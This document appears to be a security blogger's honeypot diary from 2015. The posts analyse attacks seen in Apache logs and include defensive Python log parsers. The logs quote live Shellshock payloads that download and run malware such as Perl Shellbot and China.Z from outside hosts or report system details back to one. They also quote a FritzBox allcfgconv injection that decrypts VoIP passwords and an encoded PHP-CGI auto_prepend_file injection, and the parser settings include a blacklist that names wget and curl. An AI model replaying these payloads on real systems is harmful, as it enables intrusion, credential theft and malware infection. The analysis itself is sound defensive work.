Wednesday, 27 May 2015

That's new: allcfgconv attack seen in the wild

According to my latest log files from yesterday, there was an attack which included an allcfgconv statement:

 beeswarm [mypyfwa] 2015-05-28 06:45:30.048870 get /cgi-bin/webcm                   ?getpage=../html/menus/menu2.html&var:lang=%26 allcfgconv -c voip -c -o - ../../         ../../../var/tmp/voip.cfg %26 http/1.1 162.248.50.159 US Path
The original log file shows:

 162.248.50.159 - - [27/May/2015:09:29:39 +0200] "GET /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26 allcfgconv -C voip -c -o - ../../../../../var/tmp/voip.cfg %26 HTTP/1.1" 404 493 "-" "-"
As I was unaware of the statement, I did some quick research: allcfgconv seems to be a FritzBox tool (see the manual here).
So this attack used the following options:
  • -C voip : use the voip config type
  • -c : decrypt the password
  • -o : print the config
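As an added example (not code from this post or from the mypyfwa script), here is a Python 3 function that decodes such a request path and reports whether an allcfgconv call was injected, which options it carries and whether its arguments traverse directories. SAMPLE_PATH is the request from the log line above; the function name and result layout are my own.

```python
import shlex
from urllib.parse import unquote

# Constructed sample: the request path from the access-log line quoted above.
SAMPLE_PATH = ("/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26 allcfgconv"
               " -C voip -c -o - ../../../../../var/tmp/voip.cfg %26")

def find_allcfgconv(path):
    """Decode the query string and look for an injected allcfgconv call.

    Returns None if nothing is found, otherwise a dict with the CGI parameter
    that carried the command, the config type (-C), whether the password
    decryption flag (-c) was set, the output target (-o), the source file and
    whether any argument uses '../' directory traversal.
    """
    if "?" not in path:
        return None
    for param in path.split("?", 1)[1].split("&"):
        name, _, raw_value = param.partition("=")
        value = unquote(raw_value)               # %26 -> '&', %20 -> ' ', ...
        # A decoded '&' inside a parameter value is the separator used to
        # chain a shell command onto the CGI variable assignment.
        for chunk in value.split("&"):
            try:
                argv = shlex.split(chunk)
            except ValueError:                   # unbalanced quotes: fall back
                argv = chunk.split()
            start = next((i for i, t in enumerate(argv)
                          if t.rsplit("/", 1)[-1] == "allcfgconv"), None)
            if start is None:
                continue
            result = {"param": name, "config_type": None, "decrypt": False,
                      "output": None, "source": None,
                      "traversal": any("../" in a for a in argv)}
            i = start + 1
            while i < len(argv):
                tok = argv[i]
                if tok in ("-C", "-o") and i + 1 < len(argv):
                    result["config_type" if tok == "-C" else "output"] = argv[i + 1]
                    i += 2
                    continue
                if tok == "-c":
                    result["decrypt"] = True
                elif not tok.startswith("-"):
                    result["source"] = tok       # the config file being read
                i += 1
            return result
    return None

if __name__ == "__main__":
    print(find_allcfgconv(SAMPLE_PATH))
```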

Tuesday, 26 May 2015

Introducing IBM X-Force Exchange

Several weeks ago IBM launched their X-Force Exchange web interface.
Basically, the idea behind it is a collaboration platform where everyone working in or interested in the security area can look up URLs, malware or IP information and share their knowledge:
https://exchange.xforce.ibmcloud.com/

There is an API available. You will find the link in the lower left corner after you have created an account and are logged in.

https://github.com/johestephan/sendmespamids.py is the script and toolbox for this IDS. To respond to the new platform and to use the huge database IBM has built up over time, I added ibmxforce and the XFupload.py script to my toolbox.

The script in its current state does:
  • -u <url> - queries the given URL against the API and displays the information; this is for normal URLs like http://sendmespamids.blogspot.nl
  • -m <url> - queries the given URL and displays the information; this is for URLs like http://sendmespamids.blogspot.nl/agivenfile
  • -f <file> - creates an MD5 hash of the given file, queries this hash against the API and displays the result
Currently only the raw JSON output is displayed. I am working on a deeper integration of the script into the toolbox, so stay tuned for updates.

You will need an authentication token to use the API. It is fetched and stored on the first run, so please make sure the folder is writable.


IBM and X-Force are trademarks and brands which belong to IBM (www.ibm.com).

Monday, 18 May 2015

Mid May Report

Today I will release some statistics from my honeypot. The data is fetched using the newest version of my Apache analyzer script. Source data are all access logs from 18 April until today.

~/SendMeSpamIDS.py/mypyfwa$ python mypyfwa.py -s /home/jstephan/MidMay.log -l -i 0 -f MidMay
extended Blacklist: Wget|Python|sqlmap|curl|apach0day|pma|php|connect|wordpress|wp|zmeu|masscan|morfeus
extended Whitelist: 127.0.0.1|::1
Logged 25 Lines of bad headers
Logged 351 Lines of possible injections
Logged 16 Lines of strange headers
If you want to do some research on your own, here is the source document (Google Drive).

Overall statistics (chart)

CountryCode overview (chart)

Scanner

The favourite tool for scanning Apache servers still seems to be masscan:
masscan/1.0 (https://github.com/robertdavidgraham/masscan)


Shellinjection

These are still my favourite, as you get so much out of them: you see a nice URL and you get some malware you can analyze. Pure fun :-)

Some examples:

Perl based:
194.176.119.86 - - [02/May/2015:21:14:22 +0200] "GET / HTTP/1.1" 404 412 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://psychoid.us/non -O /tmp/b.pl;curl -O /tmp/b.pl http://psychoid.us/non;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'"

other:
46.151.212.26 - - [12/May/2015:01:31:28 +0200] "GET /cgi-bin/ HTTP/1.0" 408 519 "() { :; }; /usr/bin/wget -qO - http://x.saudi.su:404/gate.asp?info-`uname`-`uname -p`-`whoami`-`wget -U curl -qO- ifconfig.me`" "() { :; }; /usr/bin/wget -qO - http://x.saudi.su:404/gate.asp?info-`uname`-`uname -p`-`whoami`-`wget -U curl -qO- ifconfig.me`"
China.Z:
121.207.230.74 - - [20/Apr/2015:22:59:37 +0200] "GET / HTTP/1.1" 404 442 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://121.207.230.74:911/java -O /tmp/China.Z-taar >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-taar >> /tmp/Run.sh;echo /tmp/China.Z-taar >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://121.207.230.74:911/java -O /tmp/China.Z-taar >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-taar >> /tmp/Run.sh;echo /tmp/China.Z-taar >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""

Length of request

I have one check which checks the request length, using a hardcoded size to detect this. Normally nothing good comes from a long request.
  • PHP encoded - means that the URL was encoded; please see an older blog post which explains this sort of attack here
  • Wordpress direct - means that this was a direct request against an admin page or similar
  • connect - means the CONNECT statements I described in an older blog post here
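As an added example (not the mypyfwa script or any code from this post), here is a Python 3 classifier that applies the checks described here to Apache combined-log lines: it flags the Shellshock marker in any logged header, pulls out the download URLs for blocking, and marks over-long requests, decoding them to see whether they carry php-cgi -d options. The log lines are constructed and shortened from the ones quoted above, and MAX_REQUEST_LEN is an assumed threshold, since the post does not give its hardcoded size.

```python
import re
from urllib.parse import unquote_plus

# Apache "combined" log format; quoted fields may contain \" escapes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>(?:[^"\\]|\\.)*)" '
    r'"(?P<agent>(?:[^"\\]|\\.)*)"$')
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{\s*:;\s*\}\s*;')   # the "() { :; };" marker
URL_RE = re.compile(r'https?://[^\s;"\'\\)`]+')          # download / callback URLs
MAX_REQUEST_LEN = 200   # assumed threshold; the post's hardcoded size is not given

def classify(line):
    """Return (category, details) for one access-log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return ("unparsable", {})
    ip, req = m.group("ip"), m.group("request")
    # Shellshock payloads arrive in whatever header Apache copies into the log.
    for field in ("referer", "agent", "request"):
        text = m.group(field)
        if SHELLSHOCK_RE.search(text):
            return ("shellshock", {"ip": ip, "field": field,
                                   "urls": sorted(set(URL_RE.findall(text)))})
    # Over-long requests: decode once and check for php-cgi -d overrides inside.
    if len(req) > MAX_REQUEST_LEN:
        decoded = unquote_plus(req)
        php = "auto_prepend_file" in decoded or "php://input" in decoded
        return ("php_encoded" if php else "long", {"ip": ip, "length": len(req)})
    return None

def summarize(lines):
    """Count lines per category, like the 'Logged N lines of ...' output above."""
    counts = {}
    for line in lines:
        result = classify(line)
        if result:
            counts[result[0]] = counts.get(result[0], 0) + 1
    return counts

# Constructed sample lines, shortened from the ones quoted in this post.
SAMPLE_LOG = r"""
194.176.119.86 - - [02/May/2015:21:14:22 +0200] "GET / HTTP/1.1" 404 412 "-" "() { :;};/usr/bin/perl -e 'system(\"wget http://psychoid.us/non -O /tmp/b.pl;perl /tmp/b.pl\");'"
46.151.212.26 - - [12/May/2015:01:31:28 +0200] "GET /cgi-bin/ HTTP/1.0" 408 519 "-" "() { :; }; /usr/bin/wget -qO - http://x.saudi.su:404/gate.asp?info-`uname`"
127.0.0.1 - - [18/May/2015:10:00:00 +0200] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
""".strip().splitlines()
PHP_LINE = ('101.251.236.91 - - [06/May/2015:09:07:16 +0200] "POST /cgi-bin/php?'
            + "%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+" * 3
            + '%2D%6E HTTP/1.1" 404 491 "-" "Mozilla/5.0"')

if __name__ == "__main__":
    for line in SAMPLE_LOG + [PHP_LINE]:
        print(classify(line))
    print(summarize(SAMPLE_LOG + [PHP_LINE]))
```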

Monday, 11 May 2015

"Case study. Please bear with us. Thank you." Injection

Tonight several attempts have hit my system:

 46.151.212.26 - - [12/May/2015:01:31:28 +0200] "GET /cgi-bin/ HTTP/1.0" 408 519 "() { :; }; /usr/bin/wget -qO - http://x.saudi.su:404/gate.asp?info-`uname`-`uname -p`-`whoami`-`wget -U curl -qO- ifconfig.me`" "() { :; }; /usr/bin/wget -qO - http://x.saudi.su:404/gate.asp?info-`uname`-`uname -p`-`whoami`-`wget -U curl -qO- ifconfig.me`"

When executing the wget request (without the info part), the final file just says:

Case study. Please bear with us. Thank you.
The idea behind the several statements is quite simple: if the injection worked, it would report to the page
  • uname - might be Linux
  • whoami - the user which owns/runs the shell
  • and the output of ifconfig.me - the IP of the server

Wednesday, 6 May 2015

PHP injection attacks (encoded URL analysis)

I adjusted my analysing script to do a length count of the request. The reason was an ongoing attack which tried to inject URL-encoded code into the system.

Such code looks like:

101.251.236.91 - - [06/May/2015:09:07:16 +0200] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0"
Honestly, this code is quite new to me, so I had to google a lot on how to work with these things.
As most blog posts just say "this is the attack, this is how it looks decoded", or just point to some decoder software on the net, I thought it might help if I tell you here in one post what this is and how to have a deeper look into it :-)

As you can see, the basic code is hidden here:

 %2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E

What looks so fancy is just an encoded URL. No hex, no base64.

My favourite tool to work with, as you may know from my scripts, is Python. So let's just start ipython and finish this:

import urllib   # Python 2; on Python 3 use urllib.parse.unquote instead

url = "/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E"

# unquote() turns every %XX sequence back into the character it stands for
print urllib.unquote(url).decode('utf-8')
 /cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env="yes"+-d+cgi.fix_pathinfo=1+-d+auto_prepend_file=php://input+-n
So, easy? Yes it is. Now you know what it is and how to decode it :-)

China.Z still out there

I am still seeing China.Z malware or variants hitting the system on a regular basis (1 to 4 each night). All attack vectors look the same; only the naming changes from time to time.

  • /tmp/China.Z-vfxr
  • /tmp/China.Z-boxo
  • /tmp/China.Z-rnxl
  • etc.

All get detected by ClamAV:
714.64.1: Linux.Trojan.IptabLex FOUND
 121.207.230.74 - - [07/May/2015:01:50:01 +0200] "GET / HTTP/1.1" 404 442 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://121.207.230.74:911/714.64 -O /tmp/China.Z-vgtd >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-vgtd >> /tmp/Run.sh;echo /tmp/China.Z-vgtd >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://121.207.230.74:911/714.64 -O /tmp/China.Z-vgtd >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-vgtd >> /tmp/Run.sh;echo /tmp/China.Z-vgtd >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
Please refer to VirusTotal for details of the source IP.

Sunday, 3 May 2015

Trojan.Perl.Shellbot-2 injection

Last night I had another 30 lines of attempted shell code injection and malware download:

194.176.119.86 - - [02/May/2015:21:14:23 +0200] "GET /cgi-bin/env.cgi HTTP/1.1" 404 471 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://psychoid.us/non -O /tmp/b.pl;curl -O /tmp/b.pl http://psychoid.us/non;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'"
The file which should have been downloaded is a Trojan.Perl.Shellbot-2 according to ClamAV.